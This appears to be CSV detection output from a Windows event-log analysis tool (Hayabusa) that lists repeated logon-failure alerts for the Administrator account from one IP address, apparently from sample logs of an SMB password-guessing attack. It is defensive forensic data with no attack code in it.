+2016-09-19 16:50:36.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVep4j7jZZAOAQAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.393 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KWWtGIQx8jBgAeoH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.427 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zn8X8gen8gX9i3QK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9OdUM99RBHzwgVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.518 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJbBVm6wDrqyQmpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAVRBfMxIyrfsEtR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wuCIClZihRxRyjGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxhpEP6nnmihvkHB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.833 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1HYmJDrWmKjj8DF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.872 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V81dIfR2SRNDk3a2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vaZpLaxB1kcCXqHP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.949 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRhs8IoV6R6vyCdL | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.988 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wUYds3Ym3G2abrV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmBfxm6pPLlSEsUI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VbAuqFggx0zz5iEn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.104 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cytpVOjb4KrNaGg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BFFFt7eFzmlzbHhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
AJQBZZiNKVGXzx4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.224 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gyu6EyrtbyowTfC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.267 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aASpkRuPfE8Nl64n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.306 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MSI2b7LpZpWO3xJW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avNkOq3fsGN3yYJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.384 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wnlgy6dW33tRk6UX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: msJ8QrqMluTeUlM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H33NuKduMuskxL0D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.500 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BHjp69CD1ttbaK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uxByLPApvfeIhU2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6g0WOAnoGpKyEyzW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.640 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P8MTs4Nkbm3ryqcp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 0Nyd7tr3y0BHmPLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.731 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J5KiDQOEnDf6xEPN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3MBP1buuRcBRiQTG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.804 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXdcg3MSqnGSvax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kej7zgIDCNR5tnnp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM8SOeQXwytB6iw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: XPNATM0IL05vtbZ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H56ci5gbBVzebS2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rRofLg1uxrojU7n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MAhtwTU8OttAhcxf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CwKgAR6OWbkFlxUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.129 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lNZR4G0DVsXVg4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.174 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZG99tl0RRN3cQoK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.216 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nwRzAutxa07Y1xE4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.254 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OwhvrVBSRa8RcCKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bLBwBys2favoK7BQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.335 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3oYpj1rGcsOWNSs7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IBogtzE6No62tJB9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:38.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQJICDi3T4LiwXZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnlKkfHYT0ID3BWr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.510 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gw36XaWrYp2M9CZd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aT76CAAER0H98I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TEOZfrP3IYmutAuq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.628 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd54DAwwp0BJhhaZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.665 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AR6Gc128RlPtwcPl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.713 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cpjS1YZy2sSRqzI3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.756 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKeate89Gw1oEp0U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tBhApsBYa65Hxr0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.894 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITv5RS3WHhWe0Hez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WASvcAp9zfU3uSka | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.972 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H1f6szOactEp5ntF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Loe5RkT9Ki0Aw2Lv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJdVtE7dNSoyM3LI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlAtU1mIO7m5DnuP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.132 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wAK2rh94yKwiH2Nw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
AuqsvmUbPlpWFBRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BShEB6VnXkOxwtFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AjAc5QMvpTBsDziO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fwwp5CD20dR8QrIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.329 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tL6GzVzndZL7DZMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.371 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zK5IpESvDA2DexwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.404 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: qvTyabCyGaxscOrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW8VghddPwP5C6dO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGZuyZ0LErZ3Sgty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.515 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bT1xrvfndr5R8Vg3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H6RFTZVJE9remzqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.599 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzjwzORvTwuBPLEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.644 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
